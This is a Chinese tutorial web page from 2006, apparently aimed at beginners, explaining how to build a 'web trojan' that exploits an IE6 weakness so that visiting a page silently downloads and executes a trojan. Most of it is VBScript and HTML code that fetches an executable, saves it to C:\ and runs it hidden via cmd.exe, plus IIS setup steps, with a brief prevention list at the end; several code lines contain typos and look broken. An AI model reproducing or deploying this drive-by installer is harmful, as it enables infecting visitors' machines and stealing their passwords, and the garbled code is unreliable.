教程(视频,书籍)下载:  ASP.NET AutoCAD 数据库 C# ASP java photoshop 网页设计 delphi 3dmax Flash C++ VB 张孝祥 实例   更多请进入BIBIDU搜索

以前写了一篇文章，讲了关于怎样用最简单的方法获取对方的管理权限，里面用到了网页木马，最近有许多网友问我怎样制作网页木马，就这个问题我发表篇比较简单易懂的文章，希望大家珍惜我的劳动成果。

　　我们经常听到这样的忠告：“不要随意下在不明的程序，不要随意打开邮件的附件...”这样的忠告确实是有用的，不过我们的系统有不少漏洞，许多木马已经不需要客户端和服务端了，他们利用这些系统漏洞按照被系统认为合法的代码执行木马的功能，有的木马会在你完全不知道的情况下潜入，现在我来讲解下通过IE6的漏洞实现访问网页后神不知鬼不觉的下在并执行指定程序的例子，也就是网页木马.

　　

　　首先我们需要编写几个简单的文件

　　

　　一。名字为abc.abc的文件

　　

　　

　　＜html＞

　　＜script language="vbscript"＞

　　Function HttpDoGet(url)

　　 set oReq = CreateObject("Microsoft.XMLHTTP")

　　 oReq.open "GET",url,false

　　 oReq.send

　　 If oReq.status=200 then

　　 HttpDoGet=oReq.respomseBody

　　 Savefile HttpDoGet,"c:\win.exe"

　　 End If

　　 Set oReq=nothing

　　End Function

　　sub SaveFile(str.fName)

　　 Set objStream = CreateObject("ADODB.Stream")

　　 objStream.Type =1

　　 objStream.Open

　　 objStream.write str

　　 objStream.SaveToFile fName.2

　　 objStream.Close()

　　 set objStream = nothing

　　 exewin()

　　End sub

　　Sub exewin()

　　 set wshshell=createobject ("wscript.shell" )

　　 a=wshshell.run ("cmd.exe /c c:\win.exe",0)

　　 b=wshshell.run ("cmd.exe /c del c:\win.hta",0)

　　 window.close

　　End Sub

　　HttpDoGet "http://127.0.0.1/test.exe"

　　＜/script＞

　　＜/html＞

　　

　　其中test.exe为木马程序，实现必须放在WEB发布的目录下，文件abc.abc也必须保存在发布的目录下。

　　
　　热门推荐： 盗QQ的密码软件模拟实现技术 网络知识之P2P技术全攻略


　　 　　二。名字为test.htm的文件

　　

　　＜html＞＜body＞

　　木马运行测试！（这句话可以改成你想说的）

　　＜object date="http://127.0.0.1/win.test";;;＞＜/object＞

　　＜/body＞＜/html＞

　　

　　三。名字为win.test的文件

　　

　　

　　＜html＞

　　＜body＞

　　＜script language="vbscript"＞

　　Function HttpDoGet(url)

　　 set oReq = CreateObject("Microsoft.XMLHTTP")

　　 oReq.open "GET",url,false

　　 oReq.send

　　 If oReq.status=200 then

　　 HttpDoGet,"c:\win.hta"

　　 Set oReq=nothing

　　 End if

　　end function

　　sub SaveFile(str,fName)

　　 Dim fso, tf

　　 S e t f s o = C r e a t e O b j e c t(Scripting.FileSystemObject")

　　 Set tf = fso.CreateTextfile(fName,True)

　　 tf.Write str

　　 tf.Close

　　 exewin()

　　End sub

　　Sub exewin()

　　 set wshshell=createobject ("wscript.shell" )

　　 a=wshshell.run ("cmd.exe /c c:\win.hat",0)

　　 window.close

　　End Sub

　　HttpDoGet("http://127.0.0.1/abc.abc")

　　＜/script＞

　　＜/body＞

　　＜/html＞

　　
　　热门推荐： 盗QQ的密码软件模拟实现技术 网络知识之P2P技术全攻略


　　

　　四。名字为test.exe的木马程序。

　　

　　晕...这个就不用我提供了吧，你想用什么木马就把他的名字换成test.exe传上去就可以了。

　　

　　服务器的文件列表

　　test.htm:对外发布的网页

　　win.test:下在文件abc.abc到对方机器上，并且保存为win.hta并且执行。

　　abc.abc下载二进制的木马文件test.exe，并执行。

　　test.exe：木马程序。

　　

　　上面所说的文件可以修改成任意名字，只是不要忘记把源码里的文件指向也修改就可以了！

　　

　　最后是设置IIS,打开“程序→管理工具→internet服务管理器”，右键单击要设置的站点，选择《属性》，在选择“http头”。单击“MIME映射”里的“文件类型”按钮，并在关联扩展名文本框中输入“.hta”，在内容类型(MIME)中输入“application/hta",然后关闭所有窗口就可以了。

　　

　　有许多朋友多遇见过，说什么赠送Q号或者玩网游的时候里面有人喊赠送好东东在XXX网址，其实那上面所说的例子用的就是这种原理，不知不觉中你机器上的所有有关于密码或者指定名词的东西全发送到对方指定的邮件箱里去了

　　

　　看完后是否觉得这种木马太危险，甚至有种想把网线拔掉的感觉那？呵呵，其实了解了网页木马的工作原理后我们就不难防护他，看完以上内容后就可以得出一个结论，网页木马主要利用IE的漏洞来实现的，所以在预防的时候一定要做到以下几点就可以保证上网的安全了，

　　A。安装IE的最新版本并且随时下在才做系统和IE的补丁程序。

　　B。不随便登陆不熟悉朋友送来的网站，对于熟悉的朋友也要小心哦。

　　C。不随便登陆黑客网站（^_^黑基除外了啦，我担保的...），色情网站，尤其一些卖外挂，卖木马的网站。

　　D。不随便打开和预览有附件的邮件。

　　E。安装防火墙和杀毒软件的最新版本，经常进行升级和查毒。

　　热门推荐： 盗QQ的密码软件模拟实现技术 网络知识之P2P技术全攻略

来源:upschool.cn
作者:
关键字：详解
发表日期：2006-12-21 3:29:36

网页显示有限 阅读全文请下载本文完整版WORD文档

上一篇：突破ip封锁登陆论坛系统   下一篇：判断你是否真的被黑客攻击

1.详解：菜鸟学习网页木马制作(1)
2.详解：菜鸟学习网页木马制作(2)

共2页 9 7 [1] [2] 8 :>

2008-12-2 9:48:23

本文的相类似文章

VB 托盘程序详解 详解：计算机病毒知识与预防 光华反病毒软件功能详解 巅峰解密 微硬盘技术详解 电脑综合诊治之硬盘故障详解 SATA硬盘分区设置与安装详解 笔记本硬盘技术详解 实现Supend to Disk的功能详解 火凤凰教程详解 精品厨房的详解教程